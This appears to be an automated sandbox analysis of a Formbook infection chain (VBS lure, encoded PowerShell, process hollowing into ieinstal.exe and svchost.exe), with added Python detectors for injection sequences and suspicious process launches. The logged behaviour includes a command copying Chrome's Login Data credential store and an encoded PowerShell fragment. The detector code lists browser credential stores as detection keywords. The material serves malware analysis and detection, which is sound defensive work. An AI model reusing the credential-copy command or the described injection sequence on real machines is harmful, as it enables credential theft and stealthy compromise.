Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0342B150 appears 35 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1EC5B150 appears 35 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC996E0 NtFreeVirtualMemory,LdrInitializeThunk, 23_2_1EC996E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99A50 NtCreateFile,LdrInitializeThunk, 23_2_1EC99A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99660 NtAllocateVirtualMemory,LdrInitializeThunk, 23_2_1EC99660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99A00 NtProtectVirtualMemory,LdrInitializeThunk, 23_2_1EC99A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99A20 NtResumeThread,LdrInitializeThunk, 23_2_1EC99A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99780 NtMapViewOfSection,LdrInitializeThunk, 23_2_1EC99780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC997A0 NtUnmapViewOfSection,LdrInitializeThunk, 23_2_1EC997A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99710 NtQueryInformationToken,LdrInitializeThunk, 23_2_1EC99710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC998F0 NtReadVirtualMemory,LdrInitializeThunk, 23_2_1EC998F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99840 NtDelayExecution,LdrInitializeThunk, 23_2_1EC99840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99860 NtQuerySystemInformation,LdrInitializeThunk, 23_2_1EC99860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC999A0 NtCreateSection,LdrInitializeThunk, 23_2_1EC999A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99540 NtReadFile,LdrInitializeThunk, 23_2_1EC99540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99910 NtAdjustPrivilegesToken,LdrInitializeThunk, 23_2_1EC99910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC996D0 NtCreateKey, 23_2_1EC996D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99A80 NtOpenDirectoryObject, 23_2_1EC99A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99650 NtQueryValueKey, 23_2_1EC99650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99670 NtQueryInformationProcess, 23_2_1EC99670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99610 NtEnumerateValueKey, 23_2_1EC99610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99A10 NtQuerySection, 23_2_1EC99A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99FE0 NtCreateMutant, 23_2_1EC99FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC9A3B0 NtGetContextThread, 23_2_1EC9A3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99760 NtOpenProcess, 23_2_1EC99760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99770 NtSetInformationFile, 23_2_1EC99770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC9A770 NtOpenThread, 23_2_1EC9A770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99B00 NtSetValueKey, 23_2_1EC99B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC9A710 NtOpenProcessToken, 23_2_1EC9A710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99730 NtQueryVirtualMemory, 23_2_1EC99730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC998A0 NtWriteVirtualMemory, 23_2_1EC998A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC9B040 NtSuspendThread, 23_2_1EC9B040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99820 NtEnumerateKey, 23_2_1EC99820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC999D0 NtCreateProcessEx, 23_2_1EC999D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC995D0 NtClose, 23_2_1EC995D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC995F0 NtQueryInformationFile, 23_2_1EC995F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99950 NtQueueApcThread, 23_2_1EC99950
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99560 NtWriteFile, 23_2_1EC99560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC99520 NtWaitForSingleObject, 23_2_1EC99520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC9AD30 NtSetContextThread, 23_2_1EC9AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469B00 NtSetValueKey,LdrInitializeThunk, 26_2_03469B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469A50 NtCreateFile,LdrInitializeThunk, 26_2_03469A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469910 NtAdjustPrivilegesToken,LdrInitializeThunk, 26_2_03469910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034699A0 NtCreateSection,LdrInitializeThunk, 26_2_034699A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469840 NtDelayExecution,LdrInitializeThunk, 26_2_03469840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469860 NtQuerySystemInformation,LdrInitializeThunk, 26_2_03469860
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469770 NtSetInformationFile,LdrInitializeThunk, 26_2_03469770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469710 NtQueryInformationToken,LdrInitializeThunk, 26_2_03469710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469FE0 NtCreateMutant,LdrInitializeThunk, 26_2_03469FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469780 NtMapViewOfSection,LdrInitializeThunk, 26_2_03469780
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469650 NtQueryValueKey,LdrInitializeThunk, 26_2_03469650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469660 NtAllocateVirtualMemory,LdrInitializeThunk, 26_2_03469660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469610 NtEnumerateValueKey,LdrInitializeThunk, 26_2_03469610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034696D0 NtCreateKey,LdrInitializeThunk, 26_2_034696D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034696E0 NtFreeVirtualMemory,LdrInitializeThunk, 26_2_034696E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469540 NtReadFile,LdrInitializeThunk, 26_2_03469540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469560 NtWriteFile,LdrInitializeThunk, 26_2_03469560
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034695D0 NtClose,LdrInitializeThunk, 26_2_034695D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0346A3B0 NtGetContextThread, 26_2_0346A3B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469A00 NtProtectVirtualMemory, 26_2_03469A00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469A10 NtQuerySection, 26_2_03469A10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469A20 NtResumeThread, 26_2_03469A20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469A80 NtOpenDirectoryObject, 26_2_03469A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469950 NtQueueApcThread, 26_2_03469950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034699D0 NtCreateProcessEx, 26_2_034699D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0346B040 NtSuspendThread, 26_2_0346B040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469820 NtEnumerateKey, 26_2_03469820
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034698F0 NtReadVirtualMemory, 26_2_034698F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034698A0 NtWriteVirtualMemory, 26_2_034698A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469760 NtOpenProcess, 26_2_03469760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0346A770 NtOpenThread, 26_2_0346A770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0346A710 NtOpenProcessToken, 26_2_0346A710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469730 NtQueryVirtualMemory, 26_2_03469730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034697A0 NtUnmapViewOfSection, 26_2_034697A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469670 NtQueryInformationProcess, 26_2_03469670
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_03469520 NtWaitForSingleObject, 26_2_03469520
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0346AD30 NtSetContextThread, 26_2_0346AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_034695F0 NtQueryInformationFile, 26_2_034695F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A2A360 NtCreateFile, 26_2_02A2A360
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A2A490 NtClose, 26_2_02A2A490
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A2A410 NtReadFile, 26_2_02A2A410
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A2A540 NtAllocateVirtualMemory, 26_2_02A2A540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A2A35D NtCreateFile, 26_2_02A2A35D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A2A48A NtClose, 26_2_02A2A48A
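The Nt* routines listed above for ieinstal.exe and svchost.exe are the primitives behind the overview's hollowing, thread-context and APC signatures: NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory and NtMapViewOfSection to place a payload, NtGetContextThread/NtSetContextThread and NtQueueApcThread to redirect execution, NtSuspendThread/NtResumeThread to control timing. Where they sit is also telling. The ieinstal.exe stubs are at 0x1EC99xxx, inside the region starting at 0x1EC30000 that the "Binary string" entries later in this report show carrying a wntdll.pdb path; the svchost.exe stubs at 0x03469xxx likewise fall in its 0x03400000 region with the same string. That is consistent with each stage calling a privately mapped copy of ntdll rather than the system one, which sidesteps user-mode hooks, so hook-based monitoring will not see the sequence below and kernel-side telemetry (ETW Threat Intelligence, a driver, or a sandbox like this one) is needed. The following is an added example, not report content: given such a trace as (caller pid, API, target pid) tuples in call order, it flags the ordered cross-process sequences. The trace and pids are constructed.

```python
from collections import defaultdict

# Added example (not from the report): detects cross-process injection sequences
# in an API trace of (caller_pid, api, target_pid) tuples, in call order. The
# trace below is constructed; pids follow the report's process numbers loosely.

# Each step is a set of interchangeable Nt* calls; a pattern fires when every
# step occurs in order from one caller against one other process.
INJECTION_PATTERNS = {
    "process hollowing": (
        {"NtCreateProcessEx", "NtCreateUserProcess"},     # suspended child
        {"NtUnmapViewOfSection"},                          # hollow the image
        {"NtWriteVirtualMemory", "NtMapViewOfSection"},    # drop the payload in
        {"NtSetContextThread"},                            # point the thread at it
        {"NtResumeThread"},
    ),
    "APC injection": (
        {"NtOpenProcess", "NtCreateProcessEx", "NtCreateUserProcess"},
        {"NtAllocateVirtualMemory", "NtMapViewOfSection"},
        {"NtQueueApcThread"},
    ),
}


def _ordered_match(apis, steps):
    """Greedy ordered-subsequence match: a call may satisfy step i only after
    some earlier call satisfied step i-1, so NtResumeThread seen before
    NtSetContextThread does not count."""
    i = 0
    for api in apis:
        if i < len(steps) and api in steps[i]:
            i += 1
    return i == len(steps)


def find_injections(trace):
    """Group cross-process calls by (caller, target) and report matched patterns."""
    per_pair = defaultdict(list)
    for caller, api, target in trace:
        if caller != target:          # a process touching its own memory is not injection
            per_pair[(caller, target)].append(api)
    hits = {}
    for pair, apis in per_pair.items():
        names = [n for n, steps in INJECTION_PATTERNS.items() if _ordered_match(apis, steps)]
        if names:
            hits[pair] = names
    return hits


SAMPLE_TRACE = [
    # powershell.exe (4) hollows a suspended ieinstal.exe (23)
    (4, "NtCreateProcessEx", 23),
    (4, "NtUnmapViewOfSection", 23),
    (4, "NtAllocateVirtualMemory", 23),
    (4, "NtWriteVirtualMemory", 23),
    (4, "NtGetContextThread", 23),
    (4, "NtSetContextThread", 23),
    (4, "NtResumeThread", 23),
    # ieinstal.exe (23) maps a section into explorer.exe (24) and fires it with an APC
    (23, "NtOpenProcess", 24),
    (23, "NtCreateSection", 23),
    (23, "NtMapViewOfSection", 23),
    (23, "NtMapViewOfSection", 24),
    (23, "NtQueueApcThread", 24),
    # benign: a debugger-style read of another process, and a local allocation
    (900, "NtOpenProcess", 24),
    (900, "NtReadVirtualMemory", 24),
    (24, "NtAllocateVirtualMemory", 24),
]

if __name__ == "__main__":
    for (caller, target), names in find_injections(SAMPLE_TRACE).items():
        print(f"pid {caller} -> pid {target}: {', '.join(names)}")
```

The ordering constraint matters: NtWriteVirtualMemory into another process is common in debuggers and crash handlers, and NtMapViewOfSection across processes is used by legitimate shared-memory IPC; it is the create-or-open, write-or-map, redirect-execution order that distinguishes injection. Extend INJECTION_PATTERNS with the NtCreateThreadEx and NtSetInformationThread variants your telemetry exposes.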
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220124 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@18/16@5/2
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Remittance Information (MT-103).vbs"
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4377.tmp" "c:\Users\user\AppData\Local\Temp\5wwhq3bl\CSCEED551C9B69E4D3BACB27851B833AAE.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
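Taken with the ShellExecute lines from the VBS and the 7837-character -EncodedCommand launch listed earlier, the tree above is the whole chain: wscript.exe starts 32-bit PowerShell with an encoded script, PowerShell compiles C# through csc.exe (the Add-Type route to Win32 APIs behind the "Accessing WinAPI in PowerShell" Sigma hit in the overview) and starts ieinstal.exe as the hollowing host, explorer.exe (which the hook entry later in this report shows was itself tampered with) launches a SysWOW64 svchost.exe, and that svchost.exe uses cmd.exe to copy Chrome's Login Data. Each hop is a detection on its own. The following is an added example, not part of the report: it applies those checks to constructed process-creation events shaped like Sysmon Event ID 1 and decodes the -EncodedCommand payload (UTF-16LE under base64) in any of the spellings powershell.exe accepts, tolerating a truncated capture like the one in the AMSI entry below. Pids, the sample script and the 4096-character threshold are assumptions.

```python
import base64
import re

# Added example (not part of the Joe Sandbox report): triage of process-creation
# events in the shape of Sysmon Event ID 1, applying the checks an analyst makes
# when reading the process tree above. Thresholds and pids are assumptions.

LONG_CMDLINE = 4096            # the PowerShell line in this report was 7837 chars
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus -ec
ENCODED_FLAGS = {"-" + "encodedcommand"[:n] for n in range(1, 15)} | {"-ec"}
FLAG_RE = re.compile(r'(?:^|\s)(-e\w*)\s+"?([A-Za-z0-9+/=]+)', re.IGNORECASE)
BROWSER_STORES = ("\\login data", "\\web data", "\\cookies", "logins.json", "key4.db")


def _name(path):
    return path.rsplit("\\", 1)[-1].lower()


def _dir(path):
    return path.rsplit("\\", 1)[0].lower()


def extract_encoded_command(cmdline):
    """Return the base64 payload of an -EncodedCommand switch in any accepted spelling, else None."""
    for flag, payload in FLAG_RE.findall(cmdline):
        if flag.lower() in ENCODED_FLAGS:
            return payload
    return None


def decode_encoded_command(payload):
    """-EncodedCommand carries UTF-16LE text. A truncated capture, such as the AMSI
    fragment this report logs, may have a dangling base64 character and an odd byte
    count; drop those instead of failing."""
    if len(payload) % 4 == 1:
        payload = payload[:-1]
    payload += "=" * (-len(payload) % 4)
    raw = base64.b64decode(payload)
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")


def triage(ev):
    """ev: {"pid", "image", "parent_image", "cmdline"}. Returns findings plus the
    decoded PowerShell script when one was present."""
    img, parent, cmd = _name(ev["image"]), _name(ev["parent_image"]), ev["cmdline"]
    findings, decoded = [], None
    if img in POWERSHELL and parent in SCRIPT_HOSTS:
        findings.append("script host spawned PowerShell")
    payload = extract_encoded_command(cmd)
    if payload is not None:
        findings.append("encoded PowerShell command")
        decoded = decode_encoded_command(payload)
    if len(cmd) > LONG_CMDLINE:
        findings.append(f"command line of {len(cmd)} chars")
    # services.exe starts svchost.exe from System32; explorer.exe starting the
    # SysWOW64 copy, as in this report, is the 'Suspect Svchost Activity' shape.
    if img == "svchost.exe" and (parent != "services.exe" or _dir(ev["image"]) != r"c:\windows\system32"):
        findings.append("svchost.exe outside the services.exe / System32 pattern")
    if img == "csc.exe" and parent in POWERSHELL:
        findings.append("PowerShell compiling C# (Add-Type)")
    if img == "cmd.exe" and any(s in cmd.lower() for s in BROWSER_STORES):
        findings.append("copy of a browser credential store")
    return {"findings": findings, "decoded": decoded}


# Constructed stand-in for the script the VBS launches: a padded comment header
# (to reach the length class the report flags) and the Add-Type step behind csc.exe.
SAMPLE_SCRIPT = "# constructed sample " + "A" * 3000 + "\nAdd-Type -TypeDefinition $src\n"
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # paths mirror the report's tree; pids are made up
    {"pid": 4, "parent_image": r"C:\Windows\System32\wscript.exe", "image": PS,
     "cmdline": f'"{PS}" -EncodedCommand "{ENCODED}"'},
    {"pid": 5, "parent_image": PS, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline"'},
    {"pid": 26, "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r"C:\Windows\SysWOW64\svchost.exe"},
    {"pid": 27, "parent_image": r"C:\Windows\SysWOW64\svchost.exe", "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V'},
    {"pid": 900, "parent_image": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},   # normal baseline
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["pid"], _name(ev["image"]), triage(ev)["findings"])
```

Decoding the payload is the step that turns the "very long command line" hit into something readable: the AMSI fragment in this report (IwBBAEkAUgBFAEQAIABTA) decodes to the comment "#AIRED S", so the script opens with a comment line, which is what GuLoader-style droppers typically hide their real code behind. Baseline the svchost rule on your own estate before deploying it; the services.exe/System32 expectation holds on current Windows, but some third-party agents spawn their own helpers with that name.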
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Champag6.dat Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_01
Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogri.ini Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: ieinstal.pdbGCTL source: svchost.exe, 0000001A.00000002.875332208.000000000392F000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000001A.00000002.874340657.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ieinstal.pdb source: svchost.exe, 0000001A.00000002.875332208.000000000392F000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000001A.00000002.874340657.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.731672310.0000000003200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.729304161.0000000003000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000001A.00000003.731672310.0000000003200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.729304161.0000000003000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: ieinstal.exe, 00000017.00000003.728221731.0000000002F07000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.741936624.000000001EAA0000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728303049.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: ieinstal.exe, 00000017.00000003.728221731.0000000002F07000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.741936624.000000001EAA0000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728303049.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBBAEkAUgBFAEQAIABTA", "", "", "0")
Source: Yara match File source: 00000017.00000000.621139519.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_035AB910 push esp; retf 4_2_035AB911
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_035A4DBD push eax; ret 4_2_035A4DC3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ECAD0D1 push ecx; ret 23_2_1ECAD0E4
